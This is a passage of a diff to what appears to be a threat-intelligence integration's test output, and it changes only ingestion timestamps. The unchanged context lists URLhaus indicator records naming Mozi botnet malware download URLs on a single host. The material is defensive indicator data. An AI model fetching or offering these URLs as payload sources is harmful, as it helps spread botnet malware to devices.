UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7250,7 +7250,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025583700Z", + "ingested": "2021-12-14T14:56:15.726446905Z", "original": "{\"id\":\"961394\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961394/\",\"url\":\"http://89.160.20.156:36828/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7299,7 +7299,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025590600Z", + "ingested": "2021-12-14T14:56:15.726447267Z", "original": "{\"id\":\"961395\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961395/\",\"url\":\"http://89.160.20.156:55281/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7348,7 +7348,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025599800Z", + "ingested": "2021-12-14T14:56:15.726447624Z", "original": "{\"id\":\"961396\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961396/\",\"url\":\"http://89.160.20.156:49772/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7397,7 +7397,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025607300Z", + "ingested": "2021-12-14T14:56:15.726447983Z", "original": "{\"id\":\"961391\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961391/\",\"url\":\"http://89.160.20.156:50229/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7446,7 +7446,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025614200Z", + "ingested": "2021-12-14T14:56:15.726448447Z", "original": "{\"id\":\"961392\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961392/\",\"url\":\"http://89.160.20.156:39996/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7495,7 +7495,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025621100Z", + "ingested": "2021-12-14T14:56:15.726448800Z", "original": "{\"id\":\"961387\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961387/\",\"url\":\"http://89.160.20.156:50195/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7544,7 +7544,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025628Z", + "ingested": "2021-12-14T14:56:15.726449157Z", "original": "{\"id\":\"961388\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961388/\",\"url\":\"http://89.160.20.156:52447/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7593,7 +7593,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025634900Z", + "ingested": "2021-12-14T14:56:15.726449536Z", "original": "{\"id\":\"961389\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961389/\",\"url\":\"http://89.160.20.156:56321/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7642,7 +7642,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025641700Z", + "ingested": "2021-12-14T14:56:15.726449946Z", "original": "{\"id\":\"961390\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961390/\",\"url\":\"http://89.160.20.156:54620/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7691,7 +7691,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025648600Z", + "ingested": "2021-12-14T14:56:15.726450409Z", "original": "{\"id\":\"961386\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961386/\",\"url\":\"http://89.160.20.156:52064/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:23:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7740,7 +7740,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025655300Z", + "ingested": "2021-12-14T14:56:15.726450767Z", "original": "{\"id\":\"961385\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961385/\",\"url\":\"http://89.160.20.156:47401/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7789,7 +7789,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025662500Z", + "ingested": "2021-12-14T14:56:15.726451335Z", "original": "{\"id\":\"961382\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961382/\",\"url\":\"http://89.160.20.156:46527/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7838,7 +7838,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025669400Z", + "ingested": "2021-12-14T14:56:15.726451861Z", "original": "{\"id\":\"961383\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961383/\",\"url\":\"http://89.160.20.156:38132/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7887,7 +7887,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025676600Z", + "ingested": "2021-12-14T14:56:15.726452223Z", "original": "{\"id\":\"961384\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961384/\",\"url\":\"http://89.160.20.156:59015/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7936,7 +7936,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025683400Z", + "ingested": "2021-12-14T14:56:15.726452578Z", "original": "{\"id\":\"961379\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961379/\",\"url\":\"http://89.160.20.156:59454/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7985,7 +7985,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025690300Z", + "ingested": "2021-12-14T14:56:15.726452941Z", "original": "{\"id\":\"961380\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961380/\",\"url\":\"http://89.160.20.156:37883/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8034,7 +8034,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025698700Z", + "ingested": "2021-12-14T14:56:15.726453352Z", "original": "{\"id\":\"961381\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961381/\",\"url\":\"http://89.160.20.156:55209/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8083,7 +8083,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025705900Z", + "ingested": "2021-12-14T14:56:15.726453841Z", "original": "{\"id\":\"961378\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961378/\",\"url\":\"http://89.160.20.156:41062/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:21:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8132,7 +8132,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025712700Z", + "ingested": "2021-12-14T14:56:15.726454193Z", "original": "{\"id\":\"961377\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961377/\",\"url\":\"http://89.160.20.156:60380/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -8181,7 +8181,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025719700Z", + "ingested": "2021-12-14T14:56:15.726454551Z", "original": "{\"id\":\"961375\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961375/\",\"url\":\"http://89.160.20.156:54796/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8230,7 +8230,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025726600Z", + "ingested": "2021-12-14T14:56:15.726454906Z", "original": "{\"id\":\"961376\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961376/\",\"url\":\"http://89.160.20.156:35251/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8279,7 +8279,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025733600Z", + "ingested": "2021-12-14T14:56:15.726455381Z", "original": "{\"id\":\"961373\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961373/\",\"url\":\"http://89.160.20.156:50562/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8328,7 +8328,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025740500Z", + "ingested": "2021-12-14T14:56:15.726455742Z", "original": "{\"id\":\"961374\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961374/\",\"url\":\"http://89.160.20.156:33445/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8377,7 +8377,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025747400Z", + "ingested": "2021-12-14T14:56:15.726456104Z", "original": "{\"id\":\"961370\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961370/\",\"url\":\"http://89.160.20.156:60280/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8426,7 +8426,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025754200Z", + "ingested": "2021-12-14T14:56:15.726456469Z", "original": "{\"id\":\"961371\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961371/\",\"url\":\"http://89.160.20.156:46386/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8475,7 +8475,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025761200Z", + "ingested": "2021-12-14T14:56:15.726457050Z", "original": "{\"id\":\"961372\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961372/\",\"url\":\"http://89.160.20.156:60288/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8524,7 +8524,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025768200Z", + "ingested": "2021-12-14T14:56:15.726457593Z", "original": "{\"id\":\"961368\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961368/\",\"url\":\"http://89.160.20.156:49731/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8573,7 +8573,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025775100Z", + "ingested": "2021-12-14T14:56:15.726457953Z", "original": "{\"id\":\"961369\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961369/\",\"url\":\"http://89.160.20.156:38837/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8622,7 +8622,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025782Z", + "ingested": "2021-12-14T14:56:15.726458312Z", "original": "{\"id\":\"961366\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961366/\",\"url\":\"http://89.160.20.156:37814/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8671,7 +8671,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025789100Z", + "ingested": "2021-12-14T14:56:15.726458666Z", "original": "{\"id\":\"961367\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961367/\",\"url\":\"http://89.160.20.156:47507/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8720,7 +8720,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025795900Z", + "ingested": "2021-12-14T14:56:15.726459024Z", "original": "{\"id\":\"961365\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961365/\",\"url\":\"http://89.160.20.156:47140/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:18:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -8769,7 +8769,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025802900Z", + "ingested": "2021-12-14T14:56:15.726459385Z", "original": "{\"id\":\"961363\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961363/\",\"url\":\"http://89.160.20.156:41514/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8818,7 +8818,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025811100Z", + "ingested": "2021-12-14T14:56:15.726459747Z", "original": "{\"id\":\"961364\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961364/\",\"url\":\"http://89.160.20.156:58748/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8867,7 +8867,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025818500Z", + "ingested": "2021-12-14T14:56:15.726460105Z", "original": "{\"id\":\"961362\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961362/\",\"url\":\"http://89.160.20.156:51183/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8916,7 +8916,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025825300Z", + "ingested": "2021-12-14T14:56:15.726460467Z", "original": "{\"id\":\"961361\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961361/\",\"url\":\"http://89.160.20.156:42104/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8965,7 +8965,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025832200Z", + "ingested": "2021-12-14T14:56:15.726460970Z", "original": "{\"id\":\"961354\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961354/\",\"url\":\"http://89.160.20.156:53130/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9014,7 +9014,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025839200Z", + "ingested": "2021-12-14T14:56:15.726461332Z", "original": "{\"id\":\"961355\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961355/\",\"url\":\"http://89.160.20.156:57768/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9063,7 +9063,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025846100Z", + "ingested": "2021-12-14T14:56:15.726461682Z", "original": "{\"id\":\"961356\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961356/\",\"url\":\"http://89.160.20.156:34541/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9112,7 +9112,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025853Z", + "ingested": "2021-12-14T14:56:15.726462040Z", "original": "{\"id\":\"961357\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961357/\",\"url\":\"http://89.160.20.156:51344/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9161,7 +9161,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025859900Z", + "ingested": "2021-12-14T14:56:15.726462512Z", "original": "{\"id\":\"961358\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961358/\",\"url\":\"http://89.160.20.156:40084/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9210,7 +9210,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025866800Z", + "ingested": "2021-12-14T14:56:15.726462871Z", "original": "{\"id\":\"961359\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961359/\",\"url\":\"http://89.160.20.156:60457/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9259,7 +9259,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025873700Z", + "ingested": "2021-12-14T14:56:15.726463245Z", "original": "{\"id\":\"961360\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961360/\",\"url\":\"http://89.160.20.156:34906/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9308,7 +9308,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025880600Z", + "ingested": "2021-12-14T14:56:15.726463590Z", "original": "{\"id\":\"961353\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961353/\",\"url\":\"http://89.160.20.156:59847/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9357,7 +9357,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025887700Z", + "ingested": "2021-12-14T14:56:15.726463947Z", "original": "{\"id\":\"961352\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961352/\",\"url\":\"http://89.160.20.156:47873/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:09:00 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not 